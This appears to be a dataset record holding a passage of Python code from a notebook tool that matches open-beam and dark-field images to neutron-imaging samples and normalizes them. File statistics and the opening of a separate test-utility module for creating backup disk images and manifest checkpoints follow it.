    pipeline: OB/DF auto-discovery, matching, first/last-OB and time-range
    computation, and the time-range selection UI.

    Fix: the original shadowed the module dunder `__name__` with a local
    variable used only for logging; the log text is now inlined unchanged.
    """
    logging.info("Retrieving sample metadata (retrieve_sample_metadata)")
    self.list_of_images = list_of_images
    self.sample_metadata_dict = MetadataHandler.retrieve_metadata(list_of_files=list_of_images,
                                                                  display_infos=False,
                                                                  label='sample')
    # logging.info(f"self.sample_metadata_dict: {self.sample_metadata_dict}")
    self.auto_retrieve_ob_metadata()
    self.auto_retrieve_df_metadata()
    self.match_files()
    self.calculate_first_and_last_ob()
    self.calculate_time_range()
    self.display_time_range_selection_widgets()
def select_ob_folder(self):
    """Open a folder picker for the open-beam images.

    Fix: pass the callback itself, not the result of calling it — the
    original `self.retrieve_ob_metadata()` invoked the method immediately
    (raising TypeError for the missing folder argument) instead of
    registering it as the `next_function` handler.
    """
    self.select_folder(message='open beam',
                       next_function=self.retrieve_ob_metadata)
def retrieve_ob_metadata(self, selected_folder):
    """Load metadata for every TIFF file in the selected open-beam folder."""
    list_of_ob_files = Get.list_of_tiff_files(folder=selected_folder)
    self.ob_metadata_dict = MetadataHandler.retrieve_metadata(list_of_files=list_of_ob_files)
def auto_retrieve_ob_metadata(self):
    """Discover open-beam images under <working_dir>/raw/ob (recursively)
    and load their metadata into self.ob_metadata_dict."""
    logging.info(f"> auto_retrieve_ob_metadata")
    folder = os.path.join(self.working_dir, 'raw', 'ob')
    logging.info(f"-> folder: {folder}")
    list_of_ob_files = file_handler.get_list_of_all_files_in_subfolders(folder=folder,
                                                                        extensions=['tiff', 'tif'])
    logging.info(f"-> nbr of ob files found: {len(list_of_ob_files)}")
    self.ob_metadata_dict = MetadataHandler.retrieve_metadata(list_of_files=list_of_ob_files,
                                                              label='ob')
    # logging.info(f"ob metadata dict")
    # logging.info(f"-> {self.ob_metadata_dict}")
def select_folder(self, message="", next_function=None):
    """Generic folder picker; `message` names the data type in the
    instruction text and `next_function` is invoked with the chosen path."""
    folder_widget = myfileselector.MyFileSelectorPanel(instruction='select {} folder'.format(message),
                                                       start_dir=self.working_dir,
                                                       next=next_function,
                                                       type='directory',
                                                       multiple=False)
    folder_widget.show()
def select_df_folder(self):
    """Open a folder picker for the dark-field images.

    Fix: pass the callback itself, not the result of calling it — the
    original `self.retrieve_df_metadata()` invoked the method immediately
    (raising TypeError for the missing folder argument) instead of
    registering it as the `next_function` handler.
    """
    self.select_folder(message='dark field',
                       next_function=self.retrieve_df_metadata)
def retrieve_df_metadata(self, selected_folder):
    """Load metadata for every TIFF file in the selected dark-field folder."""
    list_of_df_files = Get.list_of_tiff_files(folder=selected_folder)
    self.df_metadata_dict = MetadataHandler.retrieve_metadata(list_of_files=list_of_df_files)
def auto_retrieve_df_metadata(self):
    """Discover dark-field images under <working_dir>/raw/df (recursively)
    and load their metadata into self.df_metadata_dict."""
    folder = os.path.join(self.working_dir, 'raw', 'df')
    list_of_df_files = file_handler.get_list_of_all_files_in_subfolders(folder=folder,
                                                                        extensions=['tiff', 'tif'])
    logging.info(f"-> nbr of df files found: {len(list_of_df_files)}")
    self.df_metadata_dict = MetadataHandler.retrieve_metadata(list_of_files=list_of_df_files,
                                                              label='df')
def match_files(self):
    """This is where the files will be associated with their respective OB, DF by using the metadata"""
    # NOTE(review): the source view has lost indentation, so the exact
    # grouping under the JSON_DEBUGGING guard is ambiguous — the reading
    # below (only the dict build skipped in debug mode) should be confirmed.
    if not JSON_DEBUGGING:
        self.create_master_sample_dict()
    self.match_ob()
    self.match_df()
    if JSON_DEBUGGING:
        # for debugging only, exporting the json
        import json
        with open('/Users/j35/Desktop/which_ob_and_df_to_use.json', 'w') as outfile:
            json.dump(self.final_full_master_dict, outfile)
def match_ob(self):
    """we will go through all the ob and associate them with the right sample based on
    - acquisition time
    - detector type
    - aperture
    """
    list_ob_dict = self.ob_metadata_dict
    final_full_master_dict = self.final_full_master_dict
    list_of_sample_acquisition = final_full_master_dict.keys()
    for _index_ob in list_ob_dict.keys():
        _all_ob_instrument_metadata = Get.get_instrument_metadata_only(list_ob_dict[_index_ob])
        _ob_instrument_metadata = utilities.isolate_instrument_metadata(
            _all_ob_instrument_metadata)
        _acquisition_time = _all_ob_instrument_metadata[MetadataName.EXPOSURE_TIME.value]['value']
        # only OBs whose exposure time matches an existing sample group qualify
        if _acquisition_time in list_of_sample_acquisition:
            for _config_id in final_full_master_dict[_acquisition_time].keys():
                _sample_metadata_infos = final_full_master_dict[_acquisition_time][_config_id]['metadata_infos']
                # every tracked instrument metadata value must match too
                if utilities.all_metadata_match(_sample_metadata_infos, _ob_instrument_metadata):
                    final_full_master_dict[_acquisition_time][_config_id]['list_ob'].append(list_ob_dict[_index_ob])
    self.final_full_master_dict = final_full_master_dict
def match_df(self):
    """
    we will go through all the df of the IPTS and will associate the df with the right samples
    based on:
    - detector type used
    - acquisition time
    """
    list_df_dict = self.df_metadata_dict
    final_full_master_dict = self.final_full_master_dict
    list_of_sample_acquisition = final_full_master_dict.keys()
    for _index_df in list_df_dict.keys():
        _all_df_instrument_metadata = Get.get_instrument_metadata_only(list_df_dict[_index_df])
        _df_instrument_metadata = utilities.isolate_instrument_metadata(
            _all_df_instrument_metadata)
        _acquisition_time = _all_df_instrument_metadata[MetadataName.EXPOSURE_TIME.value]['value']
        if _acquisition_time in list_of_sample_acquisition:
            for _config_id in final_full_master_dict[_acquisition_time].keys():
                _sample_metadata_infos = final_full_master_dict[_acquisition_time][_config_id]['metadata_infos']
                # unlike match_ob, only a subset of metadata keys is checked
                # for DF (list_key_to_check restricts the comparison)
                if utilities.all_metadata_match(_sample_metadata_infos, _df_instrument_metadata,
                                                list_key_to_check=[METADATA_KEYS['df'][1].value]):
                    final_full_master_dict[_acquisition_time][_config_id]['list_df'].append(list_df_dict[_index_df])
    self.final_full_master_dict = final_full_master_dict
def create_master_sample_dict(self):
    """Group all sample images by acquisition (exposure) time and, within an
    acquisition time, by matching instrument configuration.

    Populates self.final_full_master_dict:
        {acquisition_time: {'config0': {...}, 'config1': {...}}, ...}
    Each config entry holds its sample file list, empty OB/DF lists
    (filled later by match_ob/match_df), first/last image records and
    NaN time-range placeholders.
    """
    final_full_master_dict = collections.OrderedDict()
    sample_metadata_dict = self.sample_metadata_dict
    # we need to keep record of which image was the first one taken and which image was the last one taken
    first_sample_image = sample_metadata_dict[0]
    last_sample_image = sample_metadata_dict[0]
    for _file_index in sample_metadata_dict.keys():
        _dict_file_index = sample_metadata_dict[_file_index]
        _sample_file = _dict_file_index['filename']
        _acquisition_time = _dict_file_index[MetadataName.EXPOSURE_TIME.value]['value']
        _instrument_metadata = utilities.isolate_instrument_metadata(_dict_file_index)
        _sample_time_stamp = _dict_file_index['time_stamp']
        # find which image was first and which image was last
        if _sample_time_stamp < first_sample_image['time_stamp']:
            first_sample_image = _dict_file_index
        elif _sample_time_stamp > last_sample_image['time_stamp']:
            last_sample_image = _dict_file_index
        # first entry or first time seeing that acquisition time
        if (len(final_full_master_dict) == 0) or not (_acquisition_time in final_full_master_dict.keys()):
            _first_images_dict = {'sample': first_sample_image,
                                  'ob': {},
                                  'df': {}}
            _last_images_dict = {'sample': last_sample_image,
                                 'ob': {},
                                 'df': {}}
            _temp_dict = {'list_sample': [_dict_file_index],
                          'first_images': _first_images_dict,
                          'last_images': _last_images_dict,
                          'list_ob': [],
                          'list_df': [],
                          'time_range_s_selected': {'before': np.NaN,
                                                    'after': np.NaN},
                          'time_range_s': {'before': np.NaN,
                                           'after': np.NaN},
                          'metadata_infos': Get.get_instrument_metadata_only(
                              _instrument_metadata)}
            final_full_master_dict[_acquisition_time] = {}
            final_full_master_dict[_acquisition_time]['config0'] = _temp_dict
        else:
            # check that all the metadata_infos match for the first group of that acquisition time,
            # otherwise check the next one or create a group
            if _acquisition_time in final_full_master_dict.keys():
                _dict_for_this_acquisition_time = final_full_master_dict[_acquisition_time]
                _found_a_match = False
                for _config_key in _dict_for_this_acquisition_time.keys():
                    _config = _dict_for_this_acquisition_time[_config_key]
                    if (utilities.all_metadata_match(metadata_1=_config['metadata_infos'],
                                                     metadata_2=_instrument_metadata)):
                        _config['list_sample'].append(_dict_file_index)
                        # refresh first/last snapshots with the running extremes
                        _first_images_dict = {'sample': first_sample_image,
                                              'ob': {},
                                              'df': {}}
                        _last_images_dict = {'sample': last_sample_image,
                                             'ob': {},
                                             'df': {}}
                        _config['first_images'] = _first_images_dict
                        _config['last_images'] = _last_images_dict
                        _found_a_match = True
                if not _found_a_match:
                    # no existing config matched: open a new configN group
                    _first_images_dict = {'sample': first_sample_image,
                                          'ob': {},
                                          'df': {}}
                    _last_images_dict = {'sample': last_sample_image,
                                         'ob': {},
                                         'df': {}}
                    _temp_dict = {'list_sample': [_dict_file_index],
                                  'first_images': _first_images_dict,
                                  'last_images': _last_images_dict,
                                  'list_ob': [],
                                  'list_df': [],
                                  'time_range_s_selected': {'before': np.NaN,
                                                            'after': np.NaN},
                                  'time_range_s': {'before': np.NaN,
                                                   'after': np.NaN},
                                  'metadata_infos': Get.get_instrument_metadata_only(
                                      _instrument_metadata)}
                    nbr_config = len(_dict_for_this_acquisition_time.keys())
                    _dict_for_this_acquisition_time['config{}'.format(nbr_config)] = _temp_dict
            else:
                # NOTE(review): this branch looks unreachable — the outer else
                # already implies _acquisition_time is a known key. Kept as-is.
                _first_images_dict = {'sample': first_sample_image,
                                      'ob': {},
                                      'df': {}}
                _last_images_dict = {'sample': last_sample_image,
                                     'ob': {},
                                     'df': {}}
                # np.NAN below is an alias of np.NaN (inconsistent spelling in original)
                _temp_dict = {'list_sample': [_dict_file_index],
                              'first_images': _first_images_dict,
                              'last_images': _last_images_dict,
                              'list_ob': [],
                              'list_df': [],
                              'time_range_s_selected': {'before': np.NAN,
                                                        'after': np.NaN},
                              'time_range_s': {'before': np.NaN,
                                               'after': np.NaN},
                              'metadata_infos': Get.get_instrument_metadata_only(
                                  _instrument_metadata)}
                final_full_master_dict[_acquisition_time] = {}
                final_full_master_dict[_acquisition_time]['config0'] = _temp_dict
    self.final_full_master_dict = final_full_master_dict
def calculate_first_and_last_ob(self):
    """this will loop through all the acquisition time keys, and config keys, to figure out
    what is the first ob and last ob in this dictionary"""
    _final_full_master_dict = self.final_full_master_dict
    for _acquisition in _final_full_master_dict.keys():
        current_acquisition_dict = _final_full_master_dict[_acquisition]
        # NaN sentinels: the first OB encountered initializes both bounds
        _first_ob_time = np.NaN
        _first_ob = {}
        _last_ob_time = np.NaN
        _last_ob = {}
        for _config in current_acquisition_dict.keys():
            current_acquisition_config_dict = current_acquisition_dict[_config]
            for _ob in current_acquisition_config_dict['list_ob']:
                _current_ob_time = _ob['time_stamp']
                if np.isnan(_first_ob_time):
                    _first_ob_time = _current_ob_time
                    _last_ob_time = _current_ob_time
                    _first_ob = _last_ob = _ob
                elif _current_ob_time < _first_ob_time:
                    _first_ob_time = _current_ob_time
                    _first_ob = _ob
                elif _current_ob_time > _last_ob_time:
                    _last_ob_time = _current_ob_time
                    _last_ob = _ob
            # NOTE(review): the bounds accumulate across all configs of this
            # acquisition, so later configs may record another config's
            # first/last OB — confirm that acquisition-wide bounds are intended.
            current_acquisition_config_dict['first_images']['ob'] = _first_ob
            current_acquisition_config_dict['last_images']['ob'] = _last_ob
def calculate_time_range(self):
    """this method will calculate the max time range of OB taken before or after and will use that
    for the slider selection time range

    Provide option to use all (that means, do not used any time range)
    """
    _final_full_master_dict = self.final_full_master_dict
    for _acquisition in _final_full_master_dict.keys():
        current_acquisition_dict = _final_full_master_dict[_acquisition]
        for _config in current_acquisition_dict.keys():
            current_acquisition_config_dict = current_acquisition_dict[_config]
            # seconds from first OB to first sample image (0 if OB came after,
            # or if either record is missing its time_stamp)
            first_sample_image = current_acquisition_config_dict['first_images']['sample']
            first_ob_image = current_acquisition_config_dict['first_images']['ob']
            delta_time_before = first_sample_image.get('time_stamp', 0) - first_ob_image.get('time_stamp', 0)
            _time_range_s_before = delta_time_before if delta_time_before > 0 else 0
            # seconds from last sample image to last OB (0 if OB came before)
            last_sample_image = current_acquisition_config_dict['last_images']['sample']
            last_ob_image = current_acquisition_config_dict['last_images']['ob']
            delta_time_after = last_ob_image.get('time_stamp', 0) - last_sample_image.get('time_stamp', 0)
            _time_range_s_after = delta_time_after if delta_time_after > 0 else 0
            _final_full_master_dict[_acquisition][_config]['time_range_s']['before'] = _time_range_s_before
            _final_full_master_dict[_acquisition][_config]['time_range_s']['after'] = _time_range_s_after
def display_time_range_selection_widgets(self):
    """Build and display the nested Tab UI: one top-level tab per acquisition
    time, one inner tab per configuration, each holding the layout produced
    by Get.full_layout_for_this_config().

    Stores the widgets on self (acquisition_tab, config_tab_dict) for the
    observer callbacks.  Fix: removed a stray bare `_config_tab` expression
    statement that had no effect.
    """
    _final_full_master_dict = self.final_full_master_dict
    _config_tab_dict = {}  # will keep record of each config tab for each acquisition
    _acquisition_tabs = widgets.Tab()
    o_get = Get(parent=self)
    for _acquisition_index, _acquisition in enumerate(_final_full_master_dict.keys()):
        _dict_of_this_acquisition = _final_full_master_dict[_acquisition]
        _config_tab = widgets.Tab()
        _current_acquisition_tab_widgets_id = {'config_tab_id': _config_tab}
        for _index, _config in enumerate(_dict_of_this_acquisition.keys()):
            _dict_config = _dict_of_this_acquisition[_config]
            _dict = o_get.full_layout_for_this_config(_dict_config)
            _layout = _dict['verti_layout']
            _config_widgets_id_dict = _dict['config_widgets_id_dict']
            _config_tab.children += (_layout,)
            _config_tab.set_title(_index, _config)
            _current_acquisition_tab_widgets_id[_index] = _config_widgets_id_dict
        _config_tab_dict[_acquisition_index] = _current_acquisition_tab_widgets_id
        _acquisition_tabs.children += (_config_tab,)  # add all the config tab to top acquisition tab
        _acquisition_tabs.set_title(_acquisition_index, "Acquisition: {}s".format(_acquisition))
    display(_acquisition_tabs)
    self.acquisition_tab = _acquisition_tabs
    self.config_tab_dict = _config_tab_dict
def calculate_max_time_before_and_after_exp_for_this_config(self, dict_config):
    """Return [seconds_before, seconds_after]: how long before the first
    sample image the first OB was taken, and how long after the last sample
    image the last OB was taken (clamped to 0 when the OB falls inside the
    sample window, or when the OB record has no time_stamp)."""
    first_sample_ts = dict_config['first_images']['sample']['time_stamp']
    first_ob_ts = dict_config['first_images']['ob'].get('time_stamp', 0)
    max_time_before = max(first_sample_ts - first_ob_ts, 0)

    last_sample_ts = dict_config['last_images']['sample']['time_stamp']
    last_ob_ts = dict_config['last_images']['ob'].get('time_stamp', 0)
    max_time_after = max(last_ob_ts - last_sample_ts, 0)

    return [max_time_before, max_time_after]
def populate_metadata_table(self, current_config):
    """Build [label widget, HTML table widget] listing the metadata entries
    used to match data sets for this configuration."""
    metadata_config = current_config['metadata_infos']
    table_label = widgets.Label("List of Metadata used to match data set",
                                layout=widgets.Layout(width='30%'))
    rows = ["<tr><th>{}</th><th>{}</th></tr>".format(entry['name'], entry['value'])
            for entry in metadata_config.values()]
    table_value = ("<table style='width:50%;background-color:#eee'>"
                   + "".join(rows)
                   + "</table>")
    return [table_label, widgets.HTML(value=table_value)]
def update_use_this_config_widget(self, state):
    """Checkbox callback for 'use this config'; intentionally a no-op.

    The per-config flag is read straight from the widget at JSON-building
    time (see create_final_json), so nothing needs to be tracked here.
    """
    pass
def update_config_widgets(self, state):
    """Show or hide the custom-time-range widgets when the checkbox toggles."""
    if state['new'] is False:
        # checkbox off -> use all files, hide the range controls
        message, visibility = None, 'hidden'
    else:
        # checkbox on -> user defines the time ranges
        message, visibility = True, 'visible'

    o_get = Get(parent=self)
    [before_ui, after_ui] = o_get.time_before_and_after_ui_of_this_config()
    label_ui = o_get.experiment_label_ui_of_this_config()
    label_ui.layout.visibility = visibility

    if visibility == 'hidden':
        before_ui.layout.visibility = 'hidden'
        after_ui.layout.visibility = 'hidden'
    else:
        # only show the sliders that have a usable time window
        self.show_or_not_before_and_after_sliders()

    self.update_time_range_event(message)
def show_or_not_before_and_after_sliders(self):
    """Show each time slider only when its config has a non-zero time window."""
    o_get = Get(parent=self)
    current_config = o_get.current_config_dict()
    [max_before, max_after] = \
        self.calculate_max_time_before_and_after_exp_for_this_config(current_config)
    [before_ui, after_ui] = o_get.time_before_and_after_ui_of_this_config()
    before_ui.layout.visibility = 'visible' if max_before > 0 else 'hidden'
    after_ui.layout.visibility = 'visible' if max_after > 0 else 'hidden'
def is_custom_time_range_checked_for_this_config(self):
    """Return True when the active config's custom-time-range checkbox is on."""
    widgets_of_config = Get(parent=self).current_config_of_widgets_id()
    checkbox = widgets_of_config['use_custom_time_range_checkbox']
    return checkbox.value
def update_time_range_event(self, value):
    """Slider callback: refresh the message, then refilter the OB file list."""
    self.update_time_range_message(value)
    self.update_list_of_files_in_widgets_using_new_time_range()
def update_list_of_files_in_widgets_using_new_time_range(self):
    """Recompute which OB files fall inside the selected time range and
    refresh the OB selection widget of the active config tab.

    When the 'custom time range' checkbox is off, every OB of the active
    acquisition/config is kept.
    """
    o_get = Get(parent=self)
    # retrieve acquisition and config values
    acquisition_key = o_get.active_tab_acquisition_key()  # ex: '55.0'
    config_key = o_get.active_tab_config_key()  # ex: 'config0'
    # retrieve list of ob and df for this config for this acquisition
    final_full_master_dict = self.final_full_master_dict
    dict_for_this_config = final_full_master_dict[float(acquisition_key)][config_key]
    list_ob = dict_for_this_config['list_ob']
    # no need to do anything more if user wants to use all the files
    if not self.is_custom_time_range_checked_for_this_config():
        list_ob_to_keep = [_file['filename'] for _file in list_ob]
    else:
        # retrieve first and last sample file for this config and for this acquisition
        first_sample_image_time_stamp = dict_for_this_config['first_images']['sample']['time_stamp']
        last_sample_images_time_stamp = dict_for_this_config['last_images']['sample']['time_stamp']
        # retrieve time before and after selected
        [time_before_selected, time_after_selected] = o_get.time_before_and_after_of_this_config()
        # calculate list of ob that are within that time range
        list_ob_to_keep = []
        for _ob_file in list_ob:
            _ob_time_stamp = _ob_file['time_stamp']
            # keep OBs taken no more than |time_before_selected|s before the first sample image ...
            if (_ob_time_stamp < first_sample_image_time_stamp) and \
                    ((first_sample_image_time_stamp - _ob_time_stamp) <= np.abs(time_before_selected)):
                list_ob_to_keep.append(_ob_file['filename'])
            # ... or no more than |time_after_selected|s after the last sample image
            elif (_ob_time_stamp > last_sample_images_time_stamp) and \
                    ((_ob_time_stamp - last_sample_images_time_stamp) <= np.abs(time_after_selected)):
                list_ob_to_keep.append(_ob_file['filename'])
    self.update_list_of_ob_for_current_config_tab(list_ob=list_ob_to_keep)
def update_list_of_ob_for_current_config_tab(self, list_ob=None):
    """Replace the OB file list shown in the currently active config tab.

    Parameters
    ----------
    list_ob : list of str, optional
        OB file names to display; all of them are selected by default.
        Defaults to an empty list.
    """
    # Fix: avoid a mutable default argument shared across calls.
    if list_ob is None:
        list_ob = []
    o_get = Get(parent=self)
    [active_acquisition, active_config] = o_get.active_tabs()
    ob_widget = self.config_tab_dict[active_acquisition][active_config]['list_of_ob']
    ob_widget.options = list_ob
    # select everything by default
    ob_widget.value = list_ob
def update_time_range_message(self, value):
    """Refresh the HTML message of the active config tab describing which
    OBs/DFs will be used.

    Parameters
    ----------
    value : None or any
        None means "use all matching OBs and DFs"; any other value means a
        custom time range is active, so the selected before/after durations
        are formatted into the message.
    """
    o_get = Get(parent=self)
    if value is None:
        _message = "Use <b><font color='red'>All </b> " \
                   "<font color='black'>OBs and DFs " \
                   "matching the samples images</font>"
    else:
        [time_before_selected, time_after_selected] = o_get.time_before_and_after_of_this_config()
        # the "before" slider can report a negative offset; only magnitude matters
        time_before_selected = np.abs(time_before_selected)

        def _format_time(_time_s):
            # Render a duration in seconds as "Xs", "Xmn Ys" or "Xhr Ymn Zs".
            if _time_s < 60:
                return "{:.2f}s".format(_time_s)
            elif _time_s < 3600:
                _time_mn = int(_time_s / 60.)
                _time_s = int(_time_s % 60)
                return "{:d}mn {:d}s".format(_time_mn, _time_s)
            else:
                _time_hr = int(_time_s / 3600.)
                _time_s_left = _time_s - _time_hr * 3600
                _time_mn = int(_time_s_left / 60.)
                _time_s = int(_time_s_left % 60)
                return "{:d}hr {:d}mn {:d}s".format(_time_hr, _time_mn, _time_s)

        str_time_before = _format_time(time_before_selected)
        str_time_after = _format_time(time_after_selected)
        logging.info(f"str_time_before: {time_before_selected} -> {str_time_before}")
        _message = "Use OB taken up to <b><font color='red'>" + str_time_before + "</b> " \
                   "<font color='black'>before and up to </font>" \
                   "<b><font color='red'>" + str_time_after + "</b> " \
                   "<font color='black'>after experiment!</font>"
    time_before_and_after_message_ui = o_get.time_before_and_after_message_ui_of_this_config()
    time_before_and_after_message_ui.value = _message
def checking_normalization_workflow(self):
    """Build the final JSON of selections, then display the recap table."""
    self.create_final_json()
    self.normalization_recap()
def create_final_json(self):
    """Assemble self.final_json_dict from the widget selections of every
    acquisition/config tab.

    For each config the dict records the sample run options, the selected
    OB and DF files, and the 'use this config' widget itself.
    """
    final_json = {}
    for acq_index, acquisition in enumerate(self.final_full_master_dict.keys()):
        tab_widgets_for_acquisition = self.config_tab_dict[acq_index]
        per_config = {}
        for cfg_index, config in enumerate(self.final_full_master_dict[acquisition].keys()):
            widgets_id = tab_widgets_for_acquisition[cfg_index]
            per_config[config] = {
                'list_sample': widgets_id['list_of_sample_runs'].options,
                'list_df': widgets_id['list_of_df'].value,
                'list_ob': widgets_id['list_of_ob'].value,
                'normalize_this_config': widgets_id['use_this_config'],
            }
        final_json[acquisition] = per_config
    self.final_json_dict = final_json
def normalization_recap(self):
    """Display a recap table of every configuration about to be run and
    whether it meets the minimum requirement (at least one OB).

    Also counts the number of configs that will actually be normalized
    into self.number_of_normalization.
    """
    final_json = self.final_json_dict
    self.number_of_normalization = 0
    parts = ["<table style='width:50%;border:1px solid black'>",
             "<tr style='background-color:#eee'><th>Acquisition (s)</th><th>Config. name</th>"
             "<th>Nbr sample</th><th>Nbr OB</th><th>Nbr DF</th><th>Status</th></tr>"]
    for _name_acquisition, acquisition_dict in final_json.items():
        for _name_config, config_dict in acquisition_dict.items():
            nbr_ob = len(config_dict['list_ob'])
            # a config is runnable only when it has at least one OB
            if nbr_ob > 0:
                self.number_of_normalization += 1
            parts.append(utilities.populate_normalization_recap_row(
                acquisition=_name_acquisition,
                config=_name_config,
                nbr_sample=len(config_dict['list_sample']),
                nbr_ob=nbr_ob,
                nbr_df=len(config_dict['list_df']),
                normalize_this_config=config_dict['normalize_this_config']))
    parts.append("</table>")
    display(widgets.HTML("".join(parts)))
def select_output_folder(self):
    """Open a folder-selection panel; the chosen folder is handed to
    self.normalization via the panel's `next` callback."""
    self.output_folder_ui = myfileselector.FileSelectorPanelWithJumpFolders(
        instruction='select where to create the normalized folders',
        start_dir=self.working_dir,
        ipts_folder=self.working_dir,
        next=self.normalization,
        type='directory',
        newdir_toolbar_button=True)
def normalization(self, output_folder):
    """Run the normalization for every selected configuration and export
    the results as TIFF stacks.

    For each acquisition/config in self.final_json_dict: skip configs with
    no OB or with 'use this config' unchecked; otherwise load sample, OB
    and (optional) DF files, normalize, and export into a folder derived
    from the output folder, acquisition and config names.  A progress bar
    tracks the configs processed.

    Parameters
    ----------
    output_folder : str
        Base folder in which one output folder per normalized
        configuration is created.
    """
    # Fix: original message read "...until" + "the busy..." (missing space)
    # and contained a duplicated "is is".
    display(HTML('<span style="font-size: 20px; color:blue">Make sure you do not close the notebook until '
                 'the busy signal (dark circle top right) is gone!</span>'))
    self.output_folder_ui.shortcut_buttons.close()  # hack to hide the buttons
    final_json = self.final_json_dict
    number_of_normalization = self.number_of_normalization
    horizontal_layout = widgets.HBox([widgets.Label("Normalization progress",
                                                    layout=widgets.Layout(width='20%')),
                                      widgets.IntProgress(max=number_of_normalization + 1,
                                                          value=0,
                                                          layout=widgets.Layout(width='50%'))])
    normalization_progress = horizontal_layout.children[1]
    display(horizontal_layout)
    list_full_output_normalization_folder_name = []
    for _name_acquisition in final_json.keys():
        _current_acquisition_dict = final_json[_name_acquisition]
        for _name_config in _current_acquisition_dict.keys():
            _current_config = _current_acquisition_dict[_name_config]
            list_ob = _current_config['list_ob']
            # nothing to normalize against without at least one OB
            if len(list_ob) == 0:
                normalization_progress.value += 1
                continue
            # user explicitly opted this config out
            if not _current_config['normalize_this_config'].value:
                normalization_progress.value += 1
                continue
            list_sample = _current_config['list_sample']
            full_output_normalization_folder_name = \
                utilities.make_full_output_normalization_folder_name(
                    output_folder=output_folder,
                    first_sample_file_name=list_sample[0],
                    name_acquisition=_name_acquisition,
                    name_config=_name_config)
            list_full_output_normalization_folder_name.append(full_output_normalization_folder_name)
            list_df = _current_config['list_df']
            o_load = Normalization()
            o_load.load(file=list(list_sample), notebook=True)
            o_load.load(file=list(list_ob), data_type='ob')
            if len(list_df) > 0:
                o_load.load(file=list(list_df), data_type='df')
            o_load.normalization()
            o_load.export(folder=full_output_normalization_folder_name, file_type='tif')
            # release the (potentially large) image stacks before the next config
            del o_load
            normalization_progress.value += 1
    horizontal_layout.close()
    display(HTML('<span style="font-size: 20px; color:blue">Following folders have been created:</span>'))
    for _folder in list_full_output_normalization_folder_name:
        _folder = _folder if _folder else "None"
        display(HTML('<span style="font-size: 15px; color:blue"> -> ' + _folder + '</span>'))
| 51.304465
| 175
| 0.579786
| 4,172
| 37,914
| 4.775168
| 0.090364
| 0.026102
| 0.0384
| 0.04864
| 0.544925
| 0.450507
| 0.346351
| 0.295502
| 0.25635
| 0.223522
| 0
| 0.006122
| 0.340798
| 37,914
| 738
| 176
| 51.373984
| 0.790981
| 0.093396
| 0
| 0.274102
| 0
| 0.009452
| 0.091439
| 0.01683
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066163
| false
| 0.00189
| 0.024575
| 0
| 0.109641
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759e0a9f6bfd13dc1e30f52a13990d9895e8e99e
| 12,719
|
py
|
Python
|
backups_manager_lib_test_util.py
|
cantstopthesignal/backups_lib
|
dec602fc90d285b8581af35e514eb90309b6da89
|
[
"Apache-2.0"
] | null | null | null |
backups_manager_lib_test_util.py
|
cantstopthesignal/backups_lib
|
dec602fc90d285b8581af35e514eb90309b6da89
|
[
"Apache-2.0"
] | null | null | null |
backups_manager_lib_test_util.py
|
cantstopthesignal/backups_lib
|
dec602fc90d285b8581af35e514eb90309b6da89
|
[
"Apache-2.0"
] | null | null | null |
import contextlib
import io
import os
import re
import subprocess
from . import backups_manager_lib
from . import backups_main
from . import lib
from .test_util import AssertEquals
from .test_util import AssertLinesEqual
from .test_util import CreateDir
from .test_util import CreateFile
from .test_util import DoBackupsMain
def CreateConfig(parent_dir, backups_filename_prefix='backups', filter_merge_path=None):
    """Create, populate and write a BackupsConfig under parent_dir; return it."""
    def prefixed(suffix):
        # All paths share the same filename prefix.
        return '%s%s' % (backups_filename_prefix, suffix)

    config = backups_manager_lib.BackupsConfig(os.path.join(parent_dir, prefixed('.config')))
    config.image_path = os.path.join(parent_dir, prefixed('.sparsebundle'))
    config.mount_path = os.path.join(parent_dir, prefixed('_mount'))
    config.src_path = CreateDir(parent_dir, prefixed('_src'))
    config.checkpoints_dir = CreateDir(parent_dir, prefixed('_checkpoints'))
    config.filter_merge_path = filter_merge_path
    config.Write()
    return config
def CreateBackupsBundle(config, create_example_content=True):
    """Create the sparse-bundle backups image for config and seed one backup.

    Creates a 10G APFS sparse bundle at config.image_path, mounts it at
    config.mount_path, and creates a single backup '2020-01-01-120000'
    containing a '.metadata' dir and a 'Root' content dir.  When
    create_example_content is True, 'Root' is populated with the example
    files f1, fX and fT.
    """
    lib.GetDiskImageHelper().CreateImage(
        config.image_path, size='10G', filesystem='APFS', image_type='SPARSEBUNDLE', volume_name='Backups')
    # mount read-write just long enough to lay down the initial backup tree
    with lib.ImageAttacher(config.image_path, config.mount_path, readonly=False,
                           browseable=False) as attacher:
        backups_dir = CreateDir(attacher.GetMountPoint(), backups_manager_lib.BACKUPS_SUBDIR)
        backup1_dir = CreateDir(backups_dir, '2020-01-01-120000')
        CreateDir(backup1_dir, '.metadata')
        disk_dir = CreateDir(backup1_dir, 'Root')
        if create_example_content:
            CreateFile(disk_dir, 'f1')
            CreateFile(disk_dir, 'fX')
            CreateFile(disk_dir, 'fT')
def CreateLatestManifestCheckpoint(config):
    """Create a manifest-only checkpoint from the last completed backup.

    Opens the backups manager, runs create-checkpoint against the last
    backup's content root, verifies the expected transfer output, copies the
    resulting manifest back onto the backup, and returns the checkpoint path
    parsed from the command output.
    """
    backups_manager = backups_manager_lib.BackupsManager.Open(
        config, readonly=False, browseable=False)
    try:
        last_backup = backups_manager.GetLastDone()
        src_root = last_backup.GetContentRootPath()
        output_lines = DoBackupsMain(['create-checkpoint',
                                      '--src-root', src_root,
                                      '--checksum-all',
                                      '--manifest-only',
                                      '--no-encrypt',
                                      '--checkpoint-name', last_backup.GetName(),
                                      '--checkpoints-dir', config.checkpoints_dir],
                                     expected_output=None)
        # the final output line announces where the checkpoint was written
        m = re.match('^Created checkpoint at (.+)$', output_lines[-1])
        assert m
        checkpoint_path = m.group(1)
        # the preceding lines list the transferred paths (example content
        # created by CreateBackupsBundle)
        AssertLinesEqual(output_lines[:-1],
                         ['>d+++++++ .',
                          '>f+++++++ f1',
                          '>f+++++++ fT',
                          '>f+++++++ fX',
                          'Transferring 4 paths (0b)'])
        # adopt the checkpoint's manifest as the backup's own manifest
        manifest = lib.ReadManifestFromImageOrPath(checkpoint_path)
        manifest.SetPath(last_backup.GetManifestPath())
        manifest.Write()
